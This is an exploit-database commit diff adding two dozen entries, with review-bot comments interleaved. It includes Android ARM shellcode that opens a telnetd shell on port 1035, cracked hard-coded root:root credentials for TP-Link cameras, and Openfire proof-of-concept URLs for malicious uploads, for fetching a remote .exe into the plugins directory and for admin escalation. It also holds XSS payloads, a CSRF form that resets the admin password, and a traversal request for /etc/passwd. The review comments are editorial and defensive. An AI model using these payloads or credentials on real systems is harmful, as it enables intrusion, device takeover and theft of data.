DB: 2015-09-16

24 new exploits
Offensive Security 2015-09-16 05:02:44 +00:00
parent 06b8156aa5
commit fcfafebf3e
25 changed files with 2002 additions and 0 deletions

@ -34451,6 +34451,8 @@ id,file,description,date,author,platform,type,port
38146,platforms/windows/dos/38146.html,"Microsoft Internet Explorer 11 - Stack Underflow Crash PoC",2015-09-11,Mjx,windows,dos,0
38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",linux,remote,0
38204,platforms/php/webapps/38204.txt,"Prizm Content Connect Arbitrary File Upload Vulnerability",2013-01-09,"Include Security Research",php,webapps,0
38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
38152,platforms/php/webapps/38152.txt,"MotoCMS admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0
38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0
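Review bot: rows 38203 and 38204 are inserted between 38148 and 38151, which breaks the ascending-id order the rest of this hunk follows (and the second hunk, which runs from 38182 up to 38209, is where those two ids belong, between 38202 and 38205); move them there so files.csv stays sorted and tooling that merges or bisects by id does not misplace them. Also, 38148 (Monsta FTP, php/webapps) carries port 80 while the other webapps rows in this hunk (38152, 38153, 38204) carry 0; the port column should be populated the same way for entries of the same type.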
@ -34483,3 +34485,25 @@ id,file,description,date,author,platform,type,port
38182,platforms/php/webapps/38182.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter XSS",2013-01-09,MustLive,php,webapps,0
38183,platforms/php/webapps/38183.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
38184,platforms/php/webapps/38184.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - SEH Overwrite Buffer Overflow",2015-09-15,"_ Un_N0n _",windows,local,0
38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0
38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80
38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80
38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0
38190,platforms/jsp/webapps/38190.txt,"Openfire 3.10.2 - Privilege Escalation",2015-09-15,hyp3rlinx,jsp,webapps,80
38191,platforms/jsp/webapps/38191.txt,"Openfire 3.10.2 - Multiple XSS Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80
38192,platforms/jsp/webapps/38192.txt,"Openfire 3.10.2 - CSRF Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80
38194,platforms/android/shellcode/38194.c,"Android Shellcode Telnetd with Parameters",2015-09-15,"Steven Padilla",android,shellcode,0
38195,platforms/windows/remote/38195.rb,"MS15-100 Microsoft Windows Media Center MCL Vulnerability",2015-09-15,metasploit,windows,remote,0
38196,platforms/php/remote/38196.rb,"CMS Bolt File Upload Vulnerability",2015-09-15,metasploit,php,remote,80
38197,platforms/php/webapps/38197.txt,"Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities",2015-09-15,Security-Assessment.com,php,webapps,80
38198,platforms/windows/local/38198.txt,"Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
38199,platforms/windows/local/38199.txt,"Windows NtUserGetClipboardAccessToken Token Leak",2015-09-15,"Google Security Research",windows,local,0
38200,platforms/windows/local/38200.txt,"Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
38201,platforms/windows/local/38201.txt,"Windows CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
38202,platforms/windows/local/38202.txt,"Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
38205,platforms/multiple/dos/38205.py,"BT Home Hub 'uuid' field Buffer Overflow Vulnerability",2013-01-08,"Zachary Cutlip",multiple,dos,0
38206,platforms/windows/remote/38206.html,"Samsung Kies Remote Buffer Overflow Vulnerability",2013-01-09,"High-Tech Bridge",windows,remote,0
38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart Cross Site Scripting Vulnerability",2013-01-09,"High-Tech Bridge",php,webapps,0
38208,platforms/multiple/dos/38208.py,"Colloquy Remote Denial of Service Vulnerability",2013-01-09,Aph3x,multiple,dos,0
38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin 'filename_1' Parameter Remote Arbitrary File Access Vulnerability",2013-01-10,Beni_Vanda,php,webapps,0
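Review bot: 38189 (Openfire 3.10.2 - Remote File Inclusion) is recorded with port 0 while its four sibling entries 38188, 38190, 38191 and 38192, which describe the same Openfire admin console, carry port 80; set 38189 to match or record the console port consistently across all five. The same applies to 38186 (TP-Link hard-coded credentials, hardware/remote, port 0) if the finding is reachable over a network service. Separately, 38203 and 38204 belong in this id range (between 38202 and 38205) but were added in the earlier hunk instead.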


@ -0,0 +1,245 @@
/*
Title: Android/ARM - telnetd with three parameters and an environment variable
Date: 2015-07-31
Tested on: Android Emulator and Samsung Note 10.1 (Android version 4.1.2)
Author: Steven Padilla - email: spadilla@tresys.com
Organization: Tresys LLC
Vendor HomePage: www.tresys.com
Version: 1.0
Android ARM shellcode with dynamic string creation and including no
0x20, 0x0a and 0x00.
This shellcode will execute telnetd listening on port 1035. Whenever
anyone connects to port 1035 they will be presented with a shell
prompt. This code assumes that telnetd and sh are executables in the
/system/bin/ directory.
In order to minimize the length of the shellcode the beginning of the
path /system/bin/ is created once and stored three times.
The executable name (/system/bin/telnetd), the other two paramaters
(-p1035 and -l/system/bin/sh) and the environment variable
(PATH=/system/bin) are strings that are created and stored in memory
above the top of the stack. The strings are created by first moving a
byte to register1, left shitf register1 8 bits, add the next byte,
left shift again, add the next byte, left shift again and then adding
the fourth byte. Note that due to endianess the bytes are added in
reverse order. Thus if the string to be created is "/adb" the 'b'
would be moved into r1, followed by the shift and then the 'd' is
added, shift, then the 'a', shift, and finally the '/'.
In the example below the stack pointer has the value 0xbe91da08.
Right before calling the execve call (i.e., svc 1 with register 7 containing
11) register0 is loaded with the 0xbe91da24, register1 is loaded with
the 0xbe91da0c and register2 is loaded with 0xbe91da1c. The memory
above the stack should look like the following (note to make it easier
to read the strings are presented in the order they appear if you read
them as strings. If you look at each word you will see the bytes in
reverse order due to endianess) :
+----------------------------------+
0xbe91da08 | NULL | This is where the stack
| | pointer is pointing.
+----------------------------------+
0xbe91da0c | 0xbe91da24 | These first three entries
| | are pointers to the path
| | of the executable and its
| | two parameters.
+----------------------------------+
0xbe91da10 | 0xbe91da50 |
+----------------------------------+
0xbe91da14 | 0xbe91da5f |
+----------------------------------+
0xbe91da18 | NULL | The list of parameters must
| | be terminated by a NULL.
+----------------------------------+
0xbe91da1c | 0xbe91da88 | This points to the first
| | (and only) environment
| | variable.
+----------------------------------+
0xbe91da20 | NULL | The list of environment
| | variables must be terminated
| | by a NULL.
+----------------------------------+
0xbe91da24 | "//system/bin/telnetd" | This is where the name of
| | the executable and the first
| | parameter is stored.
+----------------------------------+
0xbe91da50 | "-p1035" | This is where the second
| | parameter is stored.
+----------------------------------+
0xbe91da5f | "-l/system/bin/sh" | This is where the third
| | parameter is stored.
+----------------------------------+
0xbe91da88 | "PATH=/system/bin/" | This is where the first
| | environment variable is
| | stored.
+----------------------------------+
*/
#include <stdio.h>
#include <string.h>
char *SC = "\x01\x30\x8f\xe2" //add r3,pc, #1
"\x13\xff\x2f\xe1" //bx r3
"\x78\x46" //mov r0, pc
"\x18\x30" //adds r0, 0x18
"\x92\x1a" // subs r2,r2,r2
"\x49\x1a" // subs r1, r1, r1
"\x6a\x44" // add r2, sp
"\x79\x21" // mov r1, 'y'
"\x09\x02" // LSL r1,r1, #8
"\x73\x31" // adds r1, 's'
"\x09\x02" // LSL r1,r1, #8
"\x2f\x31" // adds r1, '/'
"\x09\x02" // LSL r1,r1, #8
"\x2f\x31" // adds r1, '/'
"\x07\x91" // str r1, [sp, #4]
"\x12\x25" // mov r5, 0x12
"\x4d\x40" // eor r5,r1
"\x21\x95" // str r5, [sp, #4]
"\x43\x25" // mov r5, 0x43
"\x4d\x40" // eor r5,r1
"\x16\x95" // str r5, [sp, #4]
"\x6d\x21" // mov r1, 'm'
"\x09\x02" // LSL r1,r1, #8
"\x65\x31" // adds r1, 'e'
"\x09\x02" // LSL r1,r1, #8
"\x74\x31" // adds r1, 't'
"\x09\x02" // LSL r1,r1, #8
"\x73\x31" // adds r1, 's'
"\x08\x91" // str r1, [sp, 0x8]
"\x17\x91" // str r1, [sp, 0x17]
"\x22\x91" // str r1, [sp, 0x22]
"\x6e\x21" // mov r1, 'n'
"\x09\x02" // LSL r1,r1, #8
"\x69\x31" // adds r1, 'i'
"\x09\x02" // LSL r1,r1, #8
"\x62\x31" // adds r1, 'b'
"\x09\x02" // LSL r1,r1, #8
"\x2f\x31" // adds r1, '/'
"\x09\x91" // str r1, [sp, 0x9]
"\x18\x91" // str r1, [sp, 0x18]
"\x23\x91" // str r1, [sp, 0x23]
"\x6c\x21" // mov r1, 'l'
"\x09\x02" // LSL r1,r1, #8
"\x65\x31" // adds r1, 'e'
"\x09\x02" // LSL r1,r1, #8
"\x74\x31" // adds r1, 't'
"\x09\x02" // LSL r1,r1, #8
"\x2f\x31" // adds r1, '/'
"\x28\x24" // mov r4, 0x0f
"\x11\x51" // str r1, [r2, r4]
"\x6c\x25" // mov r5, 'l'
"\x2d\x02" // LSL r1,r1, #8
"\x0d\x35" // adds r5, 0x0d
"\x2d\x02" // LSL r1,r1, #8
"\x07\x35" // adds r5, 0x07
"\x2d\x02" // LSL r1,r1, #8
"\x4d\x40" // eor r5,r1
"\x19\x95" // str r5, [sp, 0x19]
"\x64\x21" // mov r1, 'd'
"\x09\x02" // LSL r1,r1, #8
"\x74\x31" // adds r1, 't'
"\x09\x02" // LSL r1,r1, #8
"\x65\x31" // adds r1, 'e'
"\x09\x02" // LSL r1,r1, #8
"\x6e\x31" // adds r1, 'n'
"\x0b\x91" // str r1, [sp, 0xb]
"\x49\x1a" // subs r1, r1, r1
"\x0c\x91" // str r1, [sp, 0xc]
"\x30\x21" // mov r1, '0'
"\x09\x02" // LSL r1,r1, #8
"\x31\x31" // adds r1, '1'
"\x09\x02" // LSL r1,r1, #8
"\x70\x31" // adds r1, 'p'
"\x09\x02" // LSL r1,r1, #8
"\x2d\x31" // adds r1, '-'
"\x12\x91" // str r1, [sp, #44]
"\x49\x1a" // subs r1, r1, r1
"\x35\x31" // add r1, '5'
"\x09\x02" // LSL r1,r1, #8
"\x33\x31" // adds r1, '3'
"\x13\x91" // str r1, [sp, 0x13]
"\x49\x1a" // subs r1, r1, r1
"\x14\x91" // str r1, [sp, 0x14]
"\x2d\x21" // mov r1, '-'
"\x09\x02" // LSL r1,r1, #8
"\x09\x02" // LSL r1,r1, #8
"\x09\x02" // LSL r1,r1, #8
"\x15\x91" // str r1, [sp, 0x15]
"\x49\x1a" // subs r1, r1, r1
"\x1f\x91" // str r1, [sp, 0x1f]
"\x48\x21" // mov r1, 'H'
"\x09\x02" // LSL r1,r1, #8
"\x54\x31" // adds r1, 'T'
"\x09\x02" // LSL r1,r1, #8
"\x41\x31" // adds r1, 'A'
"\x09\x02" // LSL r1,r1, #8
"\x50\x31" // adds r1, 'P'
"\x80\x24" // mov r4, 0x0f
"\x11\x51" // str r1, [r2, r4]
"\x2f\x21" // mov r1, '/'
"\x24\x91" // str r1, [sp, 0x24]
"\x04\x32" // add r2, 0x4
"\x49\x1a" // subs r1, r1, r1
"\x11\x1c" // add r1, r2, #0
"\x18\x31" // add r1, 0x18
"\x01\x91" // str r1, [sp, 0x1]
"\x2c\x31" // add r1, #40
"\x02\x91" // str r1, [sp, 0x2]
"\x0f\x31" // add r1, #4
"\x03\x91" // str r1, [sp, 0x3]
"\x29\x31" // add r1, #28
"\x05\x91" // str r1, [sp, #0x5]
"\x49\x1a" // subs r1, r1, r1
"\x04\x91" // str r1, [sp, 0x4]
"\x06\x91" // str r1, [sp, 0x6]
"\x10\x1c" // add r0, r2, #0
"\x18\x30" // add r0, 0x18
"\x11\x1c" // add r1, r2, #0
"\x10\x32" // adds r2, 0x10
"\xdb\x1a" // subs r3, r3, r3
"\x0b\x27" //movs r7,#11
"\x01\xdf"; //svc 1
int main(void)
{
(*(void(*) ()) SC) ();
return 0;
}
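Review bot: several mnemonic comments on the byte array do not match the bytes they annotate, which defeats the purpose of an annotated listing: `"\x28\x24" // mov r4, 0x0f` and `"\x80\x24" // mov r4, 0x0f` actually encode `movs r4, #0x28` and `movs r4, #0x80`, the three `"\x2d\x02" // LSL r1,r1, #8` lines are shifts of r5 rather than r1, and the `str` offsets are written inconsistently (`[sp, 0x8]` and `[sp, 0x17]` are word indices of the encoded immediate, while `"\x07\x91" // str r1, [sp, #4]` and `"\x12\x91" // str r1, [sp, #44]` match neither the word index nor the byte offset), so the comments cannot be checked against the memory map in the header without re-decoding every instruction. Regenerate the comments from a disassembler before merging. The harness in `main` also casts a string literal to a function pointer and calls it; on toolchains that place `.rodata` in a non-executable mapping this faults before the first instruction, so the "Tested on" line should say how the binary was built. `<stdio.h>` and `<string.h>` are included but unused.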

@ -0,0 +1,51 @@
TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi Hard-Coded Credentials
Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us
Affected version: NC220 V1 1.0.28 Build 150629 Rel.22346
NC200 V1 2.0.15 Build 150701 Rel.20962
Summary: Designed with simplicity in mind, TP-LINK's Cloud Cameras are a
fast and trouble free way to keep track on what's going on in and around
your home. Video monitoring, recording and sharing has never been easier
with the use of TP-LINKs Cloud service. The excitement of possibilities
never end.
Desc: NC220 and NC200 utilizes hard-coded credentials within its Linux
distribution image. These sets of credentials (root:root) are never exposed
to the end-user and cannot be changed through any normal operation of the
camera.
Tested on: Linux
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5255
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php
20.07.2015
--
Initializing...
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin |grep root
root_uImage
p2048_newroot.cer
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:bin/sh
Nproot:x:0:
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin | grep home > crack.me
root@zslab:~# john crack.me
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
root (root)
guesses: 1 time: 0:00:00:00 DONE (Mon Aug 3 05:52:55 2015) c/s: 400 trying:
root - Userroot
Use the "--show" option to display all of the cracked passwords reliably
root@zslab:~# john crack.me --show
root:root:0:0:Linux User,,,:/home/root:/bin/sh
1 password hash cracked, 0 left
root@zslab:~#
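Review bot: the evidence covers only the NC220 image (`NC220_1.0.28_Build_150629_Rel.22346.bin`) while the Affected version field also lists NC200 V1 2.0.15 Build 150701; include the equivalent `strings`/`john` run against the NC200 firmware or mark that entry as untested. The two transcript lines also disagree on the shell field of the passwd entry (`:/home/root:bin/sh` in the grep output versus `:/home/root:/bin/sh` in the `--show` output), which suggests one of them was edited by hand; paste the raw output. Finally, the timeline is a single date (20.07.2015) with no vendor contact or fix status, and the "cannot be changed through any normal operation" claim is exactly what defenders need qualified: state whether a later firmware removes or rotates the root account, and which services on the camera accept that login.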

platforms/jsp/webapps/38188.txt Executable file
@ -0,0 +1,116 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-FILE-UPLOAD.txt
Vendor:
=========================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
===================
Unrestricted File Upload
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Application specifies Plugin files (.jar) can be uploaded directly by using
the form, however so can the following.
.exe
.php
.jsp
.py
.sh
Exploit code(s):
===============
1) choose some malicious file using the File browser
2) click 'upload plugin'
http://localhost:9090/plugin-admin.jsp
Our malicious uploaded files will be stored under /openfire/plugins
directory.
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
=========================================================
Medium
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] fileName
Affected Area(s): [+] Server
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
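Review bot: the Exploitation Technique field says Local, but the vector described is the admin console upload form at plugin-admin.jsp on port 9090, reached over HTTP, and the Description block itself records a POST request method; label it remote (authenticated) and state plainly that an administrator session is the precondition, since that is what justifies the Medium rating. The details also never say what Openfire does with a non-.jar file once it sits under /openfire/plugins (whether anything ever executes it), which is the difference between an arbitrary file write and code execution and should be settled before the advisory claims either. `Vendor Notification: NA` means no fix existed at disclosure; say so explicitly rather than leaving readers to infer it.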

platforms/jsp/webapps/38189.txt Executable file
@ -0,0 +1,130 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-RFI.txt
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
=================================
Remote File Inclusion
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
In "available-plugins.jsp" there is no validation for plugin downloads,
allowing arbitrary file downloads
from anywhere on the internet.
On line 40: all that needs to be satisfied is the paramater is not null.
boolean downloadRequested = request.getParameter("download") != null;
String url = request.getParameter("url");
If the above condition check returns true, the application downloads
whatever file you give it.
line 54:
if (downloadRequested) {
// Download and install new plugin
updateManager.downloadPlugin(url);
// Log the event
webManager.logEvent("downloaded new plugin from "+url, null);
}
Exploit code(s):
================
1) download arbitrary filez
e.g.
http://localhost:9090/available-plugins.jsp?download=1&url=http://ghostofsin.abyss/abysmalgod.exe
Our RFI will be downloaded to "openfire\plugins" directory.
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] download, url
Affected Area(s): [+] Server
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
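Review bot: the title says Remote File Inclusion, but the quoted code at line 54 (`updateManager.downloadPlugin(url)`) fetches a caller-supplied URL and writes the result into the plugins directory; that is server-side request forgery combined with an arbitrary file write, not inclusion of the fetched content into a page, so retitle it so readers searching by vulnerability class find the right thing. The root cause is fully visible in the two quoted lines from line 40: `downloadRequested` is derived only from the presence of the `download` parameter and `url` is never checked, so the fix worth recording is to validate `url` against the configured plugin repository host (or accept only a plugin name and build the URL server-side) and to require a CSRF token on this state-changing GET. The sibling Openfire advisories in this commit mark the Affected Area as Admin while this one says Server; state whether available-plugins.jsp requires an admin console session, because that changes the severity.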

platforms/jsp/webapps/38190.txt Executable file
@ -0,0 +1,111 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-PRIV-ESCALATION.txt
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
===================
Privilege escalation
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No check is made when updating the user privileges, allowing regular user
to become an admin.
Escalation can be done remotely too if user is logged in as no CSRF token
exist.
Exploit code(s):
===============
Become admin!
http://localhost:9090/user-edit-form.jsp?username=hyp3rlinx&save=true&name=blasphemer&email=ghostofsin@abyss.com&isadmin=on
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local or Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] isadmin
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
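Review bot: the Vulnerability Details claim a regular user can make themselves admin, but the PoC is a request to user-edit-form.jsp on the admin console with `isadmin=on`, and the second sentence concedes that the remote case works only when a user is logged in and no CSRF token exists; spell out which account issues the request, because if it must be an administrator session this is the missing-token issue already reported in the companion CSRF advisory rather than a missing authorization check, and the two should be reconciled. The Request Method is listed as GET for an action that changes privileges; the remediation to record is that privilege changes should be accepted only over POST with a per-session token and an explicit server-side check that the caller is allowed to grant the admin flag.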

platforms/jsp/webapps/38191.txt Executable file
@ -0,0 +1,137 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-XSS.txt
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
===================
Persistent & Reflected XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
1) Persistent XSS exists when creating an Group Chat Bookmark, XSS will
execute each time victim accesses
the 'Group Chat Bookmarks' web page vuln parameter 'groupchatName' XSS will
be stored in 'ofbookmark'
table in 'bookmarkName' column of the MySQL DB and will be under
boomarkType as 'group_chat'.
2) Persistent XSS exists when creating URL Bookmarks, vuln parameter
'urlName' XSS will be stored in 'ofbookmark' table in
'bookmarkName' column of the MySQL DB will be under column boomarkType as
'url'.
3) Reflected XSS entry point exists in search parameter, script tags fail
but we can defeat using onMouseMove() JS function.
Exploit code(s):
===============
1) persistent XSS:
http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=group_chat
Inject <script>alert(666)</script> payload into the 'Group Chat Name' field
then click 'Create'.
2) persistent XSS:
http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=url
Inject <script>alert('HELL')</script> payload into the 'URL Name' field
then click 'Create'.
3) Reflected XSS:
http://localhost:9090/server-session-details.jsp?hostname=
"/><script>alert(666)</script>
4) Reflected XSS:
http://localhost:9090/group-summary.jsp?search="
onMouseMove="alert('hyp3rlinx')
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local & Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] groupchatName, urlName, hostname,
search
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
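Review bot: the numbered Vulnerability Details list three issues while the Exploit code section lists four, and the reflected XSS through the `hostname` parameter of server-session-details.jsp (PoC item 3) is named only in the trailing parameter list and never described; add it to the details so the narrative and the parameter list agree. The storage details for the two persistent cases name the column `boomarkType`; if that is a typo for `bookmarkType`, correct it, since defenders may use the table and column names from this advisory to audit the `ofbookmark` table for stored payloads. Exploitation Technique is given as `Local & Remote`; all four cases are delivered through URLs or admin console forms, so `Remote` is the accurate label.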

platforms/jsp/webapps/38192.txt Executable file
@ -0,0 +1,140 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-CSRF.txt
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No CSRF tokens exists allowing us to take malicious actions against the
application.
1- change admin password.
2- add aribitrary users to the system
3- edit server settings e.g. turn off SSL.
4- Add rogue malicious clients with permit access (Allow all XMPP clients
to connect)
and more...
Exploit code(s):
===============
1) change admin password
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
<form id="HELL" action="http://localhost:9090/user-password.jsp"
method="post">
<input type="text" name="username" value="admin" >
<input type="text" name="password" value="abc123">
<input type="text" name="passwordConfirm" value="abc123" >
<input type="password" name="update" value="Update+Password" >
</form>
2) add aribitrary users
http://localhost:9090/user-create.jsp?username=hyp3rlinx&name=hyp3rlinx&email=blasphemer@abyss.com&password=abc123&passwordConfirm=abc123&create=Create+User
3) edit server settings & turn off SSL
http://localhost:9090/server-props.jsp?serverName=myserver&sslEnabled=false&save=Save+Properties
4) add rogue malicious clients
http://localhost:9090/plugins/clientcontrol/permitted-clients.jsp?all=false&other=http%3A//maliciouso.com/666.exe&addOther=Add
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] update, create, sslEnabled, other
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
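Review bot: in PoC 1 the form is defined but `doit()` is never invoked (there is no onload handler or inline call), and the `update` field is given `type="password"` where a submit or hidden input is evidently meant, so the snippet does not submit on its own as written; either describe it as a template or make the intent explicit. More useful for the record: PoCs 2 through 4 are plain GET URLs that create a user, set `sslEnabled=false` and add a permitted client, which shows the underlying defect is state-changing handlers that accept GET with no token at all, and the remediation should say so (POST-only for these handlers plus a per-session CSRF token, which the Vulnerability Details say the admin console lacks). `Vendor Notification: NA` again means no fix existed at disclosure; say so explicitly.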

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/57237/info
Schmid Watson Management Console is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the affected application. Information harvested may aid in launching further attacks.
Schmid Watson Management Console 4.11.2.G is vulnerable; other versions may also be affected.
GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd http/1.1
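Review bot: the request line uses a lowercase `http/1.1` version token and there is no Host header, both of which an HTTP/1.1 server is entitled to reject, so the PoC as transcribed may not reproduce; the advisory should show a properly formed request line. The traversal is entirely URL-encoded (`%2E%2E` rather than `..`), which is the detail worth calling out for defenders: log searches or filters that match only the literal `../` will not see this request, so decode before matching, and the application-side fix is to canonicalize the decoded path and reject anything that resolves outside the console's document root. The advisory also gives no vendor response or fixed version for 4.11.2.G.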

platforms/multiple/dos/38205.py Executable file
@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/57243/info
